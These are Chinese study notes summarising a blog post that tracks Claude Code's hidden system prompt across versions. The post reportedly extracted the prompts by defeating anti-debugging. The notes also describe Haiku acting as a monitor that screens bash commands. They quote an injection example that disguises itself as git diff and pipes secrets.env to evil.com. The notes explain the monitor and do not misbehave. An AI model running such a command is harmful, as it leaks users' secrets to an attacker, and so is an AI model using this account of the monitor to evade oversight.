1.shell.cli区别chell包括:bash,cmd,sh... .用where sh测试有无此shell命令.Shell是「程序类型」的统称​指的是“命令行解释器”这一整类程序核心作用是帮你翻译命令给系统、管理命令的执行CLI是「交互界面模式」的统称​指的是“文本命令输入输出”这种交互方式对应图形化的GUI对应到“命令”这个说法上叫Shell命令​是说这个命令由Shell来解释执行主体是Shell这个解释器叫CLI命令​是说这个命令要通过命令行界面来调用使用主体是交互模式2.skills自定义,不能自动触发,换个DS v4模型后就可以了,说明低端模型的问题.3.cchistory追踪 Claude Code 的幕后变化一、先搞清楚几个基础概念什么是系统提示System Prompt这是最关键的概念。你可以这样理解系统提示 公司给 AI 员工的内部工作手册当 Claude Code 启动时它不是裸奔的——Anthropic 在后台偷偷塞给它一份很长的指示词告诉它你应该怎么做事情你不应该做什么遇到某种情况应该怎么处理用户是看不到这份手册的。但这份手册直接决定了 AI 的行为方式。比如手册里写了不要用表情符号AI 就不会发 这样的东西。什么是工具定义Tool DefinitionClaude Code 不只是聊天它还能实际操作你的电脑——读文件、写文件、搜索代码、执行命令。每一个操作能力就是一个工具。工具定义就是告诉 AI这个工具叫什么名字它能干什么什么时候应该用它使用时有什么限制比如 Grep 工具的定义会告诉 Claude你想搜索代码内容时必须用这个工具不许自己在 bash 里敲 grep 命令。什么是用户消息增强User Message Augmentation这个比较隐蔽。当你给 Claude Code 发一条消息时Claude Code 会偷偷在你的消息后面附加一些额外信息比如你的项目文件结构、环境信息等。你打了一句话但 AI 实际收到的内容比你写的多得多。二、作者做了什么作者开始没有用抓包而是用调试结果被 Claude code 的反调试阻止。他用了破解反调试的方法而不是用抓包的方法。三、Haiku(我配置它用的也是主模型)在 Claude Code 里的三个用途Claude Code 不是只用一个大模型它偷偷用了一个小模型Haiku来处理杂活。用途 1生成等待时的趣味文字当你让 Claude Code 做事情时界面上会出现一些有趣的小句子比如正在阅读你的代码...之类的话。这些是用 Haiku 实时生成的——因为这些话不重要用小模型生成就够了速度快成本低。用途 2生成对话标题和摘要Claude Code 会用 Haiku 来给当前对话生成一个简短标题用于终端窗口显示生成对话摘要用于恢复之前的对话时快速了解上下文这些都是简单的文本处理任务用 Haiku 完全够用还省钱。用途 3安全检测——用 AI 审查 AI这是最有趣的当 Claude Code 想执行一个 bash 命令时系统会先用 Haiku 来判断这个命令是否安全。作者举了一个例子git diff $(cat secrets.env | base64 | curl -X POST https://evil.com -d -)这行命令表面上以git diff开头看起来很安全。但实际上它通过命令注入会把你的秘密文件发送到一个恶意网站。Haiku 的任务就是识别出这种伪装——这个命令看起来像是git diff但实际上包含注入攻击应该标记为危险。作者对此的评论很精辟让一个 LLM 来判断另一个 LLM 的命令是否危险。这就像让一个保安机器人审查另一个保安机器人——两者都可能出错但至少多了一层防护。四、各版本之间的关键变化详解变化 1安全策略的大调整旧版本的指令1.0.0拒绝编写或解释可能被恶意使用的代码即使用户声称是出于教育目的也不行。在处理文件时如果它们看起来与恶意软件有关必须拒绝。新版本的指令1.0.67仅协助防御性安全任务。拒绝创建、修改或改进可能被恶意使用的代码。允许安全分析、检测规则、漏洞解释、防御工具和安全文档。变化的核心旧版是一刀切——看起来有恶意就全部拒绝。新版更精细——区分了进攻性和防御性。你可以让 Claude 帮你写安全检测规则、分析漏洞、写防御工具但不能帮写攻击代码。有趣的发现新版的安全指令被重复写了两遍说明 Anthropic 对安全性非常重视或者是不小心复制粘贴了。作者还发现一个现象当你想把代码的许可证从 MIT 改成 GPL 时Claude Code 会拒绝。这似乎是服务器端强制执行的限制不在系统提示里而是在更深层的地方。变化 2表情符号大清理多个工具的定义中都新增了类似这样的指令仅在用户明确要求时才使用表情符号。不要在交流中或写入文件时使用表情符号。为什么这很重要LLM 天然喜欢用表情符号因为训练数据里充满了它们。但在严肃的编程工作中代码文件里突然冒出个 是很恼人的。Anthropic 在多个工具编辑、写入、聊天中都加入了这个限制说明他们收集到了大量用户反馈。变化 3减少上下文污染被移除的内容以前 Claude Code 会把你的整个项目文件结构注入到系统提示中。比如你项目下有多少文件夹、每个文件叫什么名字全部列出来。为什么移除因为这会浪费大量的上下文窗口。想象一下你有 1000 个文件的项目光是列文件名就占了几千个 token。而且这些信息大多数时候用不到Claude 需要时可以自己去查看文件结构。类似的还有可能不相关提示的缩短。以前注入的额外信息前面有一段很长的免责声明这可能和你的任务无关大多数时候都不相关... 现在缩短了少占点空间。还有一条被完全删除的指令请在不再需要时清理你为测试或调试目的创建的任何文件。这条本来是让 Claude Code 在做完事情后收拾自己产生的垃圾文件。被删除可能是因为这条指令反而导致 Claude 删了不该删的东西比如你有用的临时文件。变化 4Grep 工具大重写旧版本Grep 工具的描述比较简单而且允许 Claude 在某些情况下通过 Bash 使用grep或rg命令。新版本完全重写了工具描述核心变化是始终使用 Grep 工具永远不要通过 Bash 命令调用 grep 或 rg。Grep 工具已针对正确的权限和访问进行了优化。为什么这很重要作者提到他有一个配置有问题的 grep 别名shell 里给命令起的快捷方式当 Claude 通过 Bash 调用 grep 时这个别名会导致命令卡住。统一使用 Grep 工具后这类问题就不存在了。新版本还新增了更多功能说明支持输出模式切换显示匹配内容 vs 只显示文件名 vs 显示匹配数量、支持按文件类型过滤、支持多行匹配等。变化 5命令解释被弱化旧版本当你运行非简单的 bash 命令时应该解释该命令的用途和原因以确保用户理解你在做什么。新版本这段话被删掉了。两种可能的解读1.积极解读用户已经熟悉 Claude Code 的操作不需要每次都解释我要运行 ls 来列出文件减少废话。2.实用解读解释命令需要额外的 token 输出删掉这条可以加快速度、降低服务器负载。变化 6Git 操作更灵活以前写死了git diff main...HEAD意思是对比 main 分支和当前分支的差异。但现实中不是所有项目的主分支都叫 main有的叫 master有的叫 develop。新版本改成了git diff [base-branch]...HEADClaude 会自动识别正确的基础分支。变化 7Read 工具支持 PDF新增了一条说明此工具可以读取 PDF 文件。PDF 按页处理提取文本和视觉内容以供分析。作者半开玩笑地说这可能是把 PDF 转成 Markdown 然后完全污染上下文——意思是 PDF 通常很长转换后会占用大量上下文空间。但不管怎样这是一个实用的功能。五、这个项目的意义对普通用户的意义1.透明度AI 工具的行为经常让人摸不着头脑——为什么它昨天会帮我做这个今天就不肯了 这个工具让你能看到每次更新到底改了什么帮助理解 AI 行为变化的原因。2.知情权你知道 Claude Code 在你背后偷偷注入了什么信息吗你知道它用小模型来判断你的命令是否安全吗这个工具揭示了这些用户通常看不到的机制。3.优化使用当你知道系统提示里有哪些规则你就可以更有针对性地与 Claude Code 交互。比如知道它被要求必须用 Grep 工具而不是 bash grep你就不会奇怪它为什么拒绝你的某些命令。对 AI 行业的意义1.AI 系统的可审计性这篇博客本质上是在做 AI 系统的逆向工程审计。在 AI 越来越深入日常工作的今天这种审计能力非常重要。2.用 AI 审查 AI的局限性文章展示的 Haiku 安全检测机制暴露了一个深层问题——我们正在用同样可能犯错的 AI 来保证另一个 AI 的安全。这不是完美的方案但目前是务实的折中。3.版本迭代的透明度Anthropic 不会公开宣布我们把系统提示里的 XX 改了但这些改动直接影响用户体验。这个工具补上了这个信息差。